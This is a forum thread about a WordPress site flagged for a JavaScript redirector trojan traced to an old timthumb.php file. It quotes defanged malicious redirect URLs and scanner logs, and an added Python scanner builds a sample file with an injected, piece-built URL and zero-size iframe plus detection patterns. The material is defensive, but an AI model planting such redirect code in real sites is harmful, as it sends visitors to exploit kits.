js:Redirector-NT [Trj] trojan problem with Wordpress

Hi everyone,

When I try to enter my website (hxxp://hotmobilepress.com), it gives a js:Redirector-NT [Trj] alert from Avast.

I downloaded the whole site from the FTP server and scanned it with Avast and Ad-Aware, but nothing was found :frowning:
I checked my database file for any redirect address, but found nothing :frowning:

Also Sucuri report is clean too…

But Avast is still giving js:Redirector-NT [Trj] alerts…

What can I do to remove this trojan from my website?

PS: I think it's because of my easy SQL database password. If you have the same problem, check whether your database password is strong enough…

Kaspersky also detects it:
https://www.virustotal.com/file/6f4f647cee08df0cbbd1567cbc2bc886d5e97ad9fdfd785e3bb5dc3cc25e28c4/analysis/1328594043/

Same problem here:

hxxp://linky.es

The Avast alert occurs randomly, maybe one time in every 10 times I go to the site… usually when I go to the site for the first time in a few hours. Then I try to refresh and nothing. I have downloaded the home page when the alert occurs, but there is no difference from the home page when nothing occurs.

Yes, alerts occur randomly…

Still there is no solution…

Hey! King Polonus :slight_smile:

I’m waiting for your advice…

@luinwe there is no detection today:
https://www.virustotal.com/file/3e41001417bb1a03984177cde4cb57c619632be344ddf9e24eb1f260e6507686/analysis/1328650188/

@weblanzarote no detection here:
https://www.virustotal.com/file/4dcda4c11ba5d507022a56f8ba288d2afd39758e9418ae1ece03c326e5b6e31f/analysis/1328650253/

I just ran virustotal check…

https://www.virustotal.com/url/6f862765b29f8e568b7a71577372d7c8776974ba52b9a1d0ab37843ac35ffa1a/analysis/1328651337/

What should i do?

Redirecting addresses are:

hxxp://piz.de.tf/in.cgi?2
hxxp://gone.jp.mn/in.cgi?2

This script appears to point to a site that is blocked by the network shield. This is most likely the result of the alert.

If you look at the script, you can see a link that is pieced together.

There are a couple of threads about this particular detection at the moment…with different sites.

Wow! Which file/files should i look at for this script?

Hi luinwe,

The general method of infection can be gathered from what spg SCOTT gave on the other site mentioned in this thread.

The only issue I spot through the generic JS unpacker is this part of the code here for -hotmobilepress dot com:
Your Wordpress should be updated and patched here: Wordpress internal path: /home/hotmobil/public_html/wp-content/themes/LondonLive/index.php (sucuri alert for that theme)
-hotmobilepress.com/wp-content/themes/LondonLive/scripts/js/jquery-ui.min.js?ver=3.3.1 suspicious
[suspicious:2] (ipaddr:46.28.239.195) (script) -hotmobilepress.com/wp-content/themes/LondonLive/scripts/js/jquery-ui.min.js?ver=3.3.1
status: (referer=-hotmobilepress.com/)saved 183557 bytes fe810f47883364fbc4dc2c61e03a3aca0f74fed7
info: [iframe] -hotmobilepress.com/wp-content/themes/LondonLive/scripts/js/javascript:false;
info: [decodingLevel=0] found JavaScript
error: undefined variable jQuery
error: undefined variable $.fn
error: line:1: SyntaxError: missing ; before statement:
error: line:1: var $.fn = 1;
error: line:1: …^
suspicious

Avast shield does not alert, but the site is still given as suspicious here: http://urlquery.net/report.php?id=19657

For the redirect (it could be non-responsive now). see: http://demon117sec.blogspot.com/2012_02_01_archive.html (link author = Paul from demon177)
That is a redirect to blackhole exploit kit malware…

polonus

That script is on the home page, on line 31 of the source.

Thank you, but I can’t find this script code anywhere in my index.php, footer.php, header.php or the others…

I have just had another look at the page, and it appears as though the script has been removed. Have you changed anything?

Nope, I didn’t change anything.

And I can’t understand why Sucuri is giving this red alert for my index.php file. There is no explanation… My WordPress version is 3.3.1.

I am not sure on that one. 3.3.1 is the most recent version according to wordpress.org

Well, the Sucuri alert is not for an outdated WordPress version; the alert is for that specific theme: the WordPress London Live theme.

Use the WordPress Exploit Scanner: http://wordpress.org/extend/plugins/exploit-scanner/
This plugin is far from perfect, so you might have to plough through the code for changes yourself.
You fell victim to a PHP hack, so you have to secure the use of that first.

polonus

Thank you so much guys… spg SCOTT and polonus… you are great!

I found the problem. It was an old timthumb.php file!!!

Exploit Scanner showed me all of the infected files and now everything is OK with my website…

You’re welcome :slight_smile:

That is interesting, the timthumb vulnerability again… I saw that a while ago with slightly different script infections…

Scott
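Two things were found by hand in this thread: an old timthumb.php in the theme, and a redirect script whose link is "pieced together" so that the target (the in.cgi?2 URLs quoted above) never appears as a plain string in the file. The scanner below is an added example, not code from the thread, from Exploit Scanner or from any of the posters: run it over a site tree downloaded via FTP and it reports every timthumb.php/thumb.php copy with its VERSION constant, and flags files carrying generic redirector markers (eval of a decoder, a zero-size iframe, or a run of tiny string literals glued with +), reassembling the glued literals so the hidden URL can be grepped. The file names, the marker patterns, the "old before 2.0" threshold and the sample site it builds are all assumptions for illustration; check the timthumb changelog for the actual fixed version.

```python
"""Added example (not from the thread): walk a downloaded WordPress tree and flag
(a) timthumb.php copies and their VERSION, (b) files carrying markers of an
injected redirector script, reassembling any pieced-together string."""
import os
import re
import tempfile
from pathlib import Path

# Names timthumb commonly ships under (thumb.php is a frequent rename; assumption).
TIMTHUMB_NAMES = {"timthumb.php", "thumb.php"}
TIMTHUMB_VERSION = re.compile(r"""define\s*\(\s*['"]VERSION['"]\s*,\s*['"]([\d.]+)['"]""")
# Versions before the 2.0 rewrite are treated as old here (assumption; see changelog).
OLD_BEFORE = (2, 0)

# Six or more tiny string literals glued with '+': a URL being pieced together.
PIECED = re.compile(r"""(?:['"][^'"\n]{1,4}['"]\s*\+\s*){6,}['"][^'"\n]{1,4}['"]""")
LITERAL = re.compile(r"""['"]([^'"\n]*)['"]""")

# Generic redirector markers (assumed patterns, not the thread's exact payload).
# "in.cgi?" matches the redirect URLs quoted in the thread.
SUSPICIOUS = {
    "eval-decoder": re.compile(r"eval\s*\(\s*(?:unescape|String\.fromCharCode)", re.I),
    "hidden-iframe": re.compile(r"<iframe[^>]*\b(?:width|height)\s*=\s*['\"]?0\b", re.I),
    "in.cgi-redirect": re.compile(r"in\.cgi\?\d+"),
}
SCAN_EXT = {".php", ".js", ".html", ".htm"}


def version_tuple(s):
    """'1.32' -> (1, 32) so versions compare numerically, not as strings."""
    return tuple(int(p) for p in s.split(".") if p.isdigit())


def reassemble(expr):
    """Join the literals of a 'a'+'b'+... expression into the string it builds."""
    return "".join(LITERAL.findall(expr))


def scan_file(path):
    """Return a list of (kind, detail) findings for one file."""
    findings = []
    text = Path(path).read_text(encoding="utf-8", errors="ignore")
    if os.path.basename(path).lower() in TIMTHUMB_NAMES:
        m = TIMTHUMB_VERSION.search(text)
        ver = m.group(1) if m else "unknown"
        old = m is None or version_tuple(ver) < OLD_BEFORE
        findings.append(("timthumb", f"version {ver}" + (" (OLD, update or remove)" if old else "")))
    # Recover pieced-together strings first, then search markers in both raw and decoded text.
    decoded = [reassemble(m.group(0)) for m in PIECED.finditer(text)]
    for d in decoded:
        findings.append(("pieced-string", f"reassembles to {d[:80]}"))
    haystack = text + "\n" + "\n".join(decoded)
    for kind, rx in SUSPICIOUS.items():
        m = rx.search(haystack)
        if m:
            findings.append((kind, m.group(0)[:60]))
    return findings


def scan_tree(root):
    """Map relative path -> findings for every scannable file under root."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if Path(name).suffix.lower() not in SCAN_EXT:
                continue
            full = os.path.join(dirpath, name)
            hits = scan_file(full)
            if hits:
                report[os.path.relpath(full, root)] = hits
    return report


def build_sample_site():
    """Constructed sample tree (not real site content) to exercise the scanner."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    theme = Path(root, "wp-content", "themes", "demo")
    (theme / "scripts" / "js").mkdir(parents=True)
    (theme / "index.php").write_text("<?php get_header(); ?>\n<p>clean</p>\n")
    (theme / "timthumb.php").write_text("<?php\ndefine('VERSION', '1.32');\n// resize script\n")
    # Clean minified library with an injected tail: URL built one char at a time, hidden iframe.
    pieces = "+".join(f"'{c}'" for c in "http://example.invalid/in.cgi?2")
    (theme / "scripts" / "js" / "jquery-ui.min.js").write_text(
        "/*! jQuery UI sample */(function($){$.fn.demo=function(){};})(jQuery);\n"
        f"var u={pieces};document.write('<iframe src=\"'+u+'\" width=0 height=0></iframe>');\n")
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for rel, hits in sorted(scan_tree(site).items()):
        for kind, detail in hits:
            print(f"{rel}: {kind}: {detail}")
```

Run it against the FTP download rather than the live site: as the thread shows, the injected tail can be served conditionally (first visit in a few hours, not on refresh), so the copy on disk is the reliable thing to inspect. A clean report from this script is not proof of a clean site; it only covers the patterns listed, so still remove or update every old timthumb.php and replace modified core, theme and plugin files from fresh copies.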

Well, look here: http://urlquery.net/report.php?id=19989
The site is not beyond suspicion of being a phishing site, and redirects to cellphonetesters dot com,
with an undefined variable Bootloader found.
http://forums.malwarebytes.org/index.php?showtopic=105879 defines it there as a scam site.
See the bizimbal report: http://www.bizimbal.com/odb/details.html?id=935134

polonus

I am having the exact same problem. Exactly which files were infected? Could you please paste their names?

Regards
Rick